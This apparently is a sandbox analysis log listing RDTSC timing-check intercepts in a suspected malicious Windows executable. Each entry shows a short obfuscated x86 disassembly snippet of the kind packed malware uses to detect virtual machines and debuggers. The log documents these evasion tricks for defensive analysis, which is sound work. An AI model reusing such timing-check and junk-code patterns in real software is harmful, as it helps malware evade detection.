Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10939F7 second address: 1093A0A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F132877E3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F132877E3ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1093A0A second address: 1093A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F1328EC0DF6h 0x0000000c jbe 00007F1328EC0DF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1093A1C second address: 1093A26 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1093A26 second address: 1093A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10EC279 second address: 10EC27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10EC27D second address: 10EC287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10EC287 second address: 10EC28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10EC28B second address: 10EC2BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F1328EC0E09h 0x0000000e jne 00007F1328EC0DF6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1000 second address: 10B1006 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B13B4 second address: F028BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1328EC0DF6h 0x00000009 jmp 00007F1328EC0E03h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F1328EC0E06h 0x00000017 nop 0x00000018 mov dword ptr [ebp+124488CFh], ecx 0x0000001e mov dword ptr [ebp+122D1C17h], edi 0x00000024 push dword ptr [ebp+122D11D1h] 0x0000002a mov dword ptr [ebp+122D3371h], ebx 0x00000030 call dword ptr [ebp+122D25E7h] 0x00000036 pushad 0x00000037 jmp 00007F1328EC0E02h 0x0000003c xor eax, eax 0x0000003e clc 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 stc 0x00000044 mov dword ptr [ebp+122D366Eh], eax 0x0000004a jmp 00007F1328EC0E05h 0x0000004f mov esi, 0000003Ch 0x00000054 jmp 00007F1328EC0DFEh 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d sub dword ptr [ebp+122D2546h], eax 0x00000063 add dword ptr [ebp+122D2546h], edx 0x00000069 lodsw 0x0000006b jnl 00007F1328EC0DF7h 0x00000071 cmc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 jmp 00007F1328EC0E09h 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f jmp 00007F1328EC0DFCh 0x00000084 nop 0x00000085 pushad 0x00000086 ja 00007F1328EC0DFCh 0x0000008c push eax 0x0000008d push edx 0x0000008e jno 00007F1328EC0DF6h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B14E2 second address: 10B14F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B14F4 second address: F028BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, edi 0x0000000d push dword ptr [ebp+122D11D1h] 0x00000013 mov ch, 0Bh 0x00000015 call dword ptr [ebp+122D25E7h] 0x0000001b pushad 0x0000001c jmp 00007F1328EC0E02h 0x00000021 xor eax, eax 0x00000023 clc 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 stc 0x00000029 mov dword ptr [ebp+122D366Eh], eax 0x0000002f jmp 00007F1328EC0E05h 0x00000034 mov esi, 0000003Ch 0x00000039 jmp 00007F1328EC0DFEh 0x0000003e add esi, dword ptr [esp+24h] 0x00000042 sub dword ptr [ebp+122D2546h], eax 0x00000048 add dword ptr [ebp+122D2546h], edx 0x0000004e lodsw 0x00000050 jnl 00007F1328EC0DF7h 0x00000056 cmc 0x00000057 add eax, dword ptr [esp+24h] 0x0000005b jmp 00007F1328EC0E09h 0x00000060 mov ebx, dword ptr [esp+24h] 0x00000064 jmp 00007F1328EC0DFCh 0x00000069 nop 0x0000006a pushad 0x0000006b ja 00007F1328EC0DFCh 0x00000071 push eax 0x00000072 push edx 0x00000073 jno 00007F1328EC0DF6h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B16B2 second address: 10B16BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B16BE second address: 10B16E1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1328EC0DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1328EC0DFCh 0x00000010 js 00007F1328EC0DF6h 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 mov edi, dword ptr [ebp+122D3382h] 0x0000001e push eax 0x0000001f pushad 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B16E1 second address: 10B16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B18E6 second address: 10B18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B19E8 second address: 10B1A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1A03 second address: 10B1A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1328EC0DF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1A0E second address: 10B1A4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F132877E3ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, esi 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F132877E3A8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 nop 0x0000002a pushad 0x0000002b jc 00007F132877E3ACh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1D6C second address: 10B1D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1D71 second address: 10B1D76 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1D76 second address: 10B1DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007F1328EC0E00h 0x0000000e nop 0x0000000f xor dword ptr [ebp+124521A7h], edi 0x00000015 mov edi, dword ptr [ebp+122D362Eh] 0x0000001b push 0000001Eh 0x0000001d mov cl, bl 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 js 00007F1328EC0DF6h 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1DAA second address: 10B1DC0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F132877E3ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1F5A second address: 10B1F86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F1328EC0DFDh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1328EC0E03h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B21E9 second address: 1093A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F132877E3A8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D27B7h], eax 0x0000002d lea eax, dword ptr [ebp+12481C7Eh] 0x00000033 mov dword ptr [ebp+122D20B2h], eax 0x00000039 mov edx, dword ptr [ebp+122D20B9h] 0x0000003f push eax 0x00000040 push esi 0x00000041 jmp 00007F132877E3B2h 0x00000046 pop esi 0x00000047 mov dword ptr [esp], eax 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F132877E3A8h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 call dword ptr [ebp+122D3135h] 0x0000006a ja 00007F132877E3BEh 0x00000070 pushad 0x00000071 ja 00007F132877E3ACh 0x00000077 push eax 0x00000078 push edx 0x00000079 jg 00007F132877E3A6h 0x0000007f jbe 00007F132877E3A6h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10EC56F second address: 10EC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jo 00007F1328EC0DF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10EC81A second address: 10EC82E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ECAA9 second address: 10ECAB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ECAB0 second address: 10ECACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F132877E3B2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ECC16 second address: 10ECC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ECC1A second address: 10ECC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F132877E3A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ECC2C second address: 10ECC36 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1328EC0DF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F09E9 second address: 10F09EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F09EF second address: 10F09FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1328EC0DFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F3755 second address: 10F376A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F132877E3A6h 0x0000000c jns 00007F132877E3A6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F8206 second address: 10F820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F7939 second address: 10F7951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F132877E3AEh 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F7AE6 second address: 10F7AEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F7C63 second address: 10F7C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10F7C6C second address: 10F7C73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10FB1C6 second address: 10FB1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1100FA2 second address: 1100FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1100FB6 second address: 1100FD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B0h 0x00000007 pushad 0x00000008 jmp 00007F132877E3ADh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1100FD8 second address: 1100FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1100FE6 second address: 1100FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1100FEC second address: 1100FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1100FF0 second address: 110101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F132877E3ADh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F132877E3B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11011D7 second address: 11011E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F1328EC0DF6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1101300 second address: 1101304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11015AB second address: 11015B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1328EC0DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1B4F second address: 10B1B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F132877E3ABh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B1D88 second address: 10B1DAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor dword ptr [ebp+124521A7h], edi 0x0000000d mov edi, dword ptr [ebp+122D362Eh] 0x00000013 push 0000001Eh 0x00000015 mov cl, bl 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b js 00007F1328EC0DF6h 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1101881 second address: 1101885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1102330 second address: 110234A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1328EC0E05h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 110234A second address: 1102350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1102350 second address: 1102354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108039 second address: 110805E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F132877E3B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F132877E3AEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 110805E second address: 1108062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108062 second address: 1108067 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108728 second address: 110872F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 110872F second address: 1108743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F132877E3A6h 0x0000000a jmp 00007F132877E3AAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108A5A second address: 1108A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E05h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108D18 second address: 1108D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F132877E3B0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108D30 second address: 1108D3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108D3A second address: 1108D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108D3E second address: 1108D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108FEC second address: 1108FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1108FF0 second address: 1108FF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11095A5 second address: 11095A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11095A9 second address: 11095B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1328EC0DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11098C4 second address: 11098CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1109B4B second address: 1109B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1109B4F second address: 1109B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F132877E3AAh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1109B66 second address: 1109B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1109B6A second address: 1109B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1113196 second address: 11131A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jno 00007F1328EC0E02h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11131A5 second address: 11131AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 106BDB5 second address: 106BDD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1328EC0DFAh 0x0000000d push eax 0x0000000e jc 00007F1328EC0DFEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112A3A second address: 1112A62 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F132877E3A6h 0x00000008 jmp 00007F132877E3AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F132877E3ABh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112BBC second address: 1112BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1328EC0E06h 0x00000009 jmp 00007F1328EC0DFDh 0x0000000e jng 00007F1328EC0DF6h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
